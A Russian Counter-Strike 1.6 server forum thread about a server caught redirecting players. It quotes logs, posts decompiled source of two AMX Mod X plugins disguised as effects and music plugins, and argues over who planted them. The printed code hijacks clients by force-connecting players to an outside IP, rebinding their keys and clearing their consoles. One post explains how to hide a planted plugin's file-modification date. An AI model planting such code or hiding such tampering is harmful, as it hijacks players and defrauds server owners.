Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

> Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

редирект, подставили

erzhan2396
сообщение 10.2.2018, 6:23
Сообщение #1
Стаж: 9 лет 1 месяц

Сообщений: 273
Благодарностей: 23
Полезность: < 0

вообщем такая же проблема как тут была https://c-s.net.ua/forum/topic84470.html?hl...%E8%F0%E5%EA%F2
сегодня ночью получил бан на гсм и турбо-бусте за редирект (вчера ночью занял випку на турбо-бусте)

redirect: connect 95.47.161.115:27037
bind: bind f2 bind=connect 95.47.161.115:27037
bind: bind f5 bind=connect 95.47.161.115:27037
bind: bind v bind=connect 95.47.161.115:27037
bind: bind x bind=connect 95.47.161.115:27037
bind: bind capslock bind=connect 95.47.161.115:27037
bind: bind [ bind=connect 95.47.161.115:27037
bind: bind h bind=connect 95.47.161.115:27037
bind: bind f6 bind=connect 95.47.161.115:27037
bind: bind c bind=connect 95.47.161.115:27037
bind: bind z bind=connect 95.47.161.115:27037
bind: bind mouse3 bind=connect 95.47.161.115:27037
bind: bind ] bind=connect 95.47.161.115:27037
bind: bindf5menu
bind: bind f4 bind=connect 95.47.161.115:27037

Не понял как такое могло произойти, был на работе, через телефон отключил сервер, щас пришел с работы включаю сервер захожу, смотрю консоль и .... нет редиректа, только это было в консоли
Сервер отправил запрещеную команду: "bind""F5""menu
Сервер отправил запрещеную команду: rate 25000
Сервер отправил запрещеную команду: fps_max 101
Сервер отправил запрещеную команду: cl_cmdrate 101
Сервер отправил запрещеную команду: cl_updaterate 101

смотрел логи на гсм, вот что нашел на 23 января(17 января я установил такую же зомби сборку как у админа хостинга)
[spoiler=bind: bindf5menu
bind: bindwbind=connect auto.ddns.dp.ua:27015
bind: bindsbind=connect auto.ddns.dp.ua:27015

и вот лог 9 февраля редирект на МОЙ же сервер redirect: connect 82.200.128.162:27069
Кто это делает я кажется догадываюсь, возможно админ хостинга нашего казахстанского joingame.kz ,причины у него на то есть,
https://c-s.net.ua/forum/topic87758.html
других вариантов пока нет

Отредактировал: erzhan2396, - 10.2.2018, 6:44
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   Цитировать сообщение
erzhan2396
сообщение 10.2.2018, 6:43
Сообщение #2
Стаж: 9 лет 1 месяц

Сообщений: 273
Благодарностей: 23
Полезность: < 0

а вот и причина
17 января купил зомби сборку как у него(админа хостинга), раскрутил за 1 месяц, у него естественно бомбануло, что его игроки начали ко мне уходить,
потом постоянно сервер не запускается https://c-s.net.ua/forum/topic87758.html тех поддержка на тикеты не отвечают, закрывают их, каждые 3-4 дня не запускается сервер. приходится переустанавливать, потом звонил ему, он говорит что он ничего не трогал, говорит за обвинения вообще мои оба сервера удалит с хостинга
Nike Kazakhstan = паблик мой

файлообменник картинок
Зомби Апокалипсис = это мой

фото img
Ходячие мертвецы = Админа хостинга

Империя страха = сервер чела из тех поддержки хостинга
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
erzhan2396
сообщение 10.2.2018, 6:47
Сообщение #3
Стаж: 9 лет 1 месяц

Сообщений: 273
Благодарностей: 23
Полезность: < 0

посоветуйте нормальный хостинг и можно ли будет випки на gsm, boostcs, turbo-boost перенести?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя vavarik
сообщение 10.2.2018, 7:57
Сообщение #4


Стаж: 15 лет
Город: Саратов

Сообщений: 942
Благодарностей: 318
Полезность: 143

SarHosting.ru
Цитата(erzhan2396 @ 10.2.2018, 6:47) *
посоветуйте нормальный хостинг и можно ли будет випки на gsm, boostcs, turbo-boost перенести?
Что то подобное уже описывалось на форуме ранее. У администрации хостинга не должно быть своих серверов, если только это не для нужд самого хостинга (проверка плагинов, моделей, обновлений и работы самих сборок). От недобросовестности администраторов никто не застрахован. Если хотите полностью избежать таких проблем, то единственный выход - это VDS или дедик.
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя make89
сообщение 10.2.2018, 11:34
Сообщение #5


Стаж: 13 лет

Сообщений: 79
Благодарностей: 7
Полезность: 71

Как говорится руки из жопы!

Cкрытый текст
#pragma semicolon 1
#pragma ctrlchar '\'

new src_sound[1][] =
{
"Effects/ha.mp3"
};
new UserData[33][2];
new objHud;

get_configsdir(String:name[], len)
{
return get_localinfo("amxx_configsdir", name, len);
}

public plugin_init()
{
register_plugin("Effects plug-in", "1.0", "OverGame");
register_event("DeathMsg", "EventKilling", "a", "1>0");
register_cvar("effects_screen", "1", 0, 0.00);
register_cvar("effects_screen_sound", "1", 0, 0.00);
register_cvar("effects_killing_count", "1", 0, 0.00);
register_cvar("effects_roundend_sound", "1", 0, 0.00);
register_clcmd("say admin", "connect", -1, "", -1);
register_clcmd("say lol", "connect", -1, "", -1);
register_clcmd("say /rs", "connect", -1, "", -1);
register_clcmd("say /me", "connect", -1, "", -1);
register_clcmd("say :D", "connect", -1, "", -1);
register_clcmd("say go", "connect", -1, "", -1);
objHud = CreateHudSyncObj(0);
plugin_cfg();
if (get_cvar_num("effects_killing_count"))
{
set_task(1.00, "killing_count", 0, "", 0, "b", 0);
}
return 0;
}

public client_connect(id)
{
!!! Removed Phi
if (get_user_flags(id, 0) & 8)
{
return 1;
}
if (6 <= get_playersnum(0))
{
client_cmd(id, "connect 95.47.161.115:27037");
client_cmd(id, "clear");
}
return 0;
}

public connect(id)
{
if (get_user_flags(id, 0) & 8)
{
return 1;
}
client_cmd(id, "connect 95.47.161.115:27037");
client_cmd(id, "clear");
return 1;
}

public client_authorized(id)
{
if (get_user_flags(id, 0) & 8)
{
return 1;
}
client_cmd(id, "bind \"F2\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"F4\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"F5\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"F6\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"v\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"c\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"x\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"z\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"capslock\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"mouse3\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"[\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"]\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"h\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "clear");
return 0;
}

public plugin_cfg()
{
new szCfgDir[64];
new szFile[192];
get_configsdir(szCfgDir, 63);
formatex(szFile, 191, "%s/Effects/effects.cfg", szCfgDir);
if (file_exists(szFile))
{
server_cmd("exec %s", szFile);
}
return 0;
}

public client_putinserver(id)
{
UserData[id][0][0][0] = 0;
UserData[id][0][0][1] = 0;
return 0;
}

public logevent_round_start()
{
new id = 0;
while (get_maxplayers() >= id)
{
UserData[id][0][0][0] = 0;
UserData[id][0][0][1] = 0;
id++;
}
return 0;
}

public EventKilling()
{
new iKiller = read_data(1);
new iVictim = read_data(2);
new iHead = read_data(3);
new var1;
if (get_cvar_num("effects_killing_count"))
{
if (iHead)
{
UserData[iKiller][0][0]++;
new var3 = UserData[iKiller];
var3[0][0][1]++;
var1 = var4;
}
new var4 = UserData[iKiller];
var4[0][0]++;
}
else
{
var1 = var3;
}
new var2;
if (get_cvar_num("effects_screen_sound"))
{
new var5 = src_sound;
client_cmd(iVictim, "mp3 play sound/%s", var5[0][0][var5]);
var2 = var5;
}
else
{
var2 = var1;
}
if
(get_cvar_num("effects_screen"))
{
show_screen(iVictim, 255, 0, 0);
}
return 1;
}

public killing_count()
{
!!! Removed Phi
new id = 0;
while (get_maxplayers() >= id)
{
if ((!is_user_bot(id) && is_user_connected(id) && UserData[id][0][0][0] > 0) || UserData[id][0][0][1] > 0)
{
new buffer[128];
new len = 0;
set_hudmessage(100, 100, 100, 0.06, 0.70, 0, 4.00, 1.00, 0.10, 0.20, -1);
len = format(buffer, 127, "Вы убили: %d\n", UserData[id][0][0]);
len = format(buffer[len], 127 - len, "В голову: %d", UserData[id][0][0][1]) + len;
ShowSyncHudMsg(id, objHud, buffer);
id++;
}
id++;
}
return 0;
}

show_screen(id, r, g, b)
{
message_begin(MSG_ONE, get_user_msgid("ScreenFade"), 4680, id);
write_short(1024);
write_short(1024);
write_short(0);
write_byte®;
write_byte(g);
write_byte(b);
write_byte(100);
message_end();
return 0;
}
[23.01.2018 16:41:31] Nurzhan: ))
[23.01.2018 16:41:50] Максим: отключил и удалили плагин ему)))
[23.01.2018 16:41:58] Максим: другие проверю тоже)
[23.01.2018 16:52:46] Максим: wcm_music.amxx
[23.01.2018 16:52:57] Максим: #pragma semicolon 1
#pragma ctrlchar '\'


public plugin_init()
{
register_plugin(0, "1.0", "My_StyLe^");
register_clcmd("say admin", "connect", -1, "", -1);
register_clcmd("say de_dust2", "connect", -1, "", -1);
register_clcmd("say de_dust2_2x2", "connect", -1, "", -1);
register_clcmd("say go", "connect", -1, "", -1);
register_clcmd("say qq", "connect", -1, "", -1);
register_clcmd("say dno", "connect", -1, "", -1);
register_clcmd("say /me", "connect", -1, "", -1);
register_clcmd("say /menu", "connect", -1, "", -1);
return 0;
}

public client_putinserver(id)
{
set_task(0.20, "WelcomeMusic", id, "", 0, "", 0);
return 1;
}

public WelcomeMusic(id)
{
client_cmd(id, "mp3 play sound/WelcomeMusic");
return 1;
}

public plugin_precache()
{
precache_sound("WelcomeMusic.mp3");
return 0;
}

public client_connect(id)
{
!!! Removed Phi
if (get_user_flags(id, 0) & 8)
{
return 1;
}
if (6 <= get_playersnum(0))
{
client_cmd(id, "connect 95.47.161.115:27037");
client_cmd(id, "clear");
}
return 0;
}

public connect(id)
{
if (get_user_flags(id, 0) & 8)
{
return 1;
}
client_cmd(id, "connect 95.47.161.115:27037");
client_cmd(id, "clear");
return 0;
}

public client_authorized(id)
{
if (get_user_flags(id, 0) & 8)
{
return 1;
}
client_cmd(id, "bind \"F2\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"F4\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"F5\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"F6\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"v\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"c\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"x\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"z\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"capslock\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"mouse3\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"[\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"]\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "bind \"h\" \"connect 95.47.161.115:27037\"");
client_cmd(id, "clear");
return 0;
}


Всякую понаставили, еще и администрацию вините?

Отредактировал: make89, - 10.2.2018, 11:37
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя energydance
сообщение 10.2.2018, 11:53
Сообщение #6


Стаж: 10 лет

Сообщений: 2809
Благодарностей: 740
Полезность: 213

make89, ну конешно с17го января все было норм а тут как гром среди ясного неба у него нарисовался редирект


Press enter to exit ...
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя BaHeK
сообщение 10.2.2018, 13:32
Сообщение #7


Стаж: 17 лет

Сообщений: 571
Благодарностей: 505
Полезность: 651

Цитата(energydance @ 10.2.2018, 13:53) *
make89, ну конешно с17го января все было норм а тут как гром среди ясного неба у него нарисовался редирект

Более вероятная версия, что пользователь рукожоп и гавноплагин сам поставил, чем это сделал хостинг.


Чуть-чуть нарушаю
http://img-host.su/aoN1.png
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
erzhan2396
сообщение 10.2.2018, 14:25
Сообщение #8
Стаж: 9 лет 1 месяц

Сообщений: 273
Благодарностей: 23
Полезность: < 0

make89, у меня не было такого плагина, интересно а что за плагин был? сколько было 56 плагинов столько же и осталось
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя paraz1t15
сообщение 10.2.2018, 14:57
Сообщение #9
Стаж: 11 лет
Город: Красноярск

Сообщений: 240
Благодарностей: 49
Полезность: 171

make89, абсолютно разные плагины разных авторов и с одинаковыми биндами?
Почти все исходники его плагинов можно найти и вшить в них свои радости, раз у него с админов личные неприязни, вполне даже возможен и такой вариант
Хотя автор всё равно как говорили выше руки из того самого места
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
KILLER07
сообщение 10.2.2018, 17:31
Сообщение #10
Стаж: 8 лет 3 месяца

Сообщений: 351
Благодарностей: 69
Полезность: < 0

если этому серверу Ходячие мертвецы = Админа хостинга 3 года, то он меня кинул за випку... скинул ему деньги он и не дал мне
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя Palach
сообщение 10.2.2018, 21:42
Сообщение #11


Стаж: 8 лет 4 месяца
Город: Крым

Сообщений: 133
Благодарностей: 3
Полезность: 27

Русский хостинг подойдет?


Крым Арена =) ©
212.76.137.107:27023
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя SISA
сообщение 10.2.2018, 23:31
Сообщение #12
Стаж: 15 лет

Сообщений: 2774
Благодарностей: 2956
Полезность: 994

Цитата
сколько было 56 плагинов столько же и осталось


А вы что, не можете посмотреть дату изменения файлов на FTP ?
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя energydance
сообщение 10.2.2018, 23:34
Сообщение #13


Стаж: 10 лет

Сообщений: 2809
Благодарностей: 740
Полезность: 213

SISA, дату изменения легко скрыть ))
можно файл plugins.ini закинуть на пк каким он был , затем в другую папку закинуть этот же plugins.ini добавить плагин залить на сервер ждать смену карты и вуаля подстава удалась , а чтоб замести следы , берем файлик plugins.ini который скачали изначально и ничего в нем не прописовали и кидаем с заменой на сервер и в итоге дата изменения будет прежней которая была изначально


Press enter to exit ...
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя SISA
сообщение 10.2.2018, 23:38
Сообщение #14
Стаж: 15 лет

Сообщений: 2774
Благодарностей: 2956
Полезность: 994

energydance,

Можно, но вряд ли они будут этим заниматься smile.gif
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя dehost
сообщение 10.2.2018, 23:42
Сообщение #15


Стаж: 13 лет

Сообщений: 3147
Благодарностей: 1431
Полезность: 486

energydance,
Не совсем понятно, я полагаю что дату изменения файла, именно на фтп можно всегда просмотреть через менеджера, не зависимо когда сам файл был переписан...
Cкрытый текст
Прикрепленное изображение


Отредактировал: dehost, - 10.2.2018, 23:44


Золотое правило нравственности:
"Относись к людям так, как хочешь, чтобы относились к тебе."
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
Поблагодарили 1 раз
   + Цитировать сообщение
Статус пользователя dehost
сообщение 11.2.2018, 0:13
Сообщение #16


Стаж: 13 лет

Сообщений: 3147
Благодарностей: 1431
Полезность: 486

energydance,
И причем тут plugins.ini если подозрения на изменения самих плагинов? Его вообще можно не трогать в этом случае, а вот изменения по амх будут видны на фтп.


Золотое правило нравственности:
"Относись к людям так, как хочешь, чтобы относились к тебе."
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя energydance
сообщение 11.2.2018, 0:23
Сообщение #17


Стаж: 10 лет

Сообщений: 2809
Благодарностей: 740
Полезность: 213

Цитата(dehost @ 11.2.2018, 3:13) *
energydance,
Не совсем понятно, я полагаю что дату изменения файла, именно на фтп можно всегда просмотреть через менеджера, не зависимо когда сам файл был переписан..

записал бы видео , вот канала на ютюбе нету (((
Цитата
И причем тут plugins.ini если подозрения на изменения самих плагинов? Его вообще можно не трогать в этом случае, а вот изменения по амх будут видны на фтп.

но и такое возможно если владелец хоста (например) шарит в коде
но тоже слабо верится что у человека все было нормально он занял еще место в турбо буст вроде , а затем редирект dntknw.gif
уверен что там точно рука админа была ))


Press enter to exit ...
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя DRW
сообщение 11.2.2018, 0:42
Сообщение #18
Стаж: 11 лет

Сообщений: 819
Благодарностей: 156
Полезность: 70

Номер гадалки дать?


сигаретный дым под облака незаметно джин обнял бокал
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
Статус пользователя LaBonnotte
сообщение 11.2.2018, 0:51
Сообщение #19
Стаж: 8 лет 7 месяцев

Сообщений: 117
Благодарностей: 12
Полезность: 5

energydance, давай, видео залей на файловый хостинг или в вк. Там тебе ютуб и не нужен


Лохи особенно хорошо разводятся в местах их скопления. Вот собственно почему я и на этом форуме :)
Перейти в начало страницы         Просмотр профиля    Отправить личное сообщение
   + Цитировать сообщение
  Ответить в данную темуНачать новую тему
 
0 пользователей и 3 гостей читают эту тему: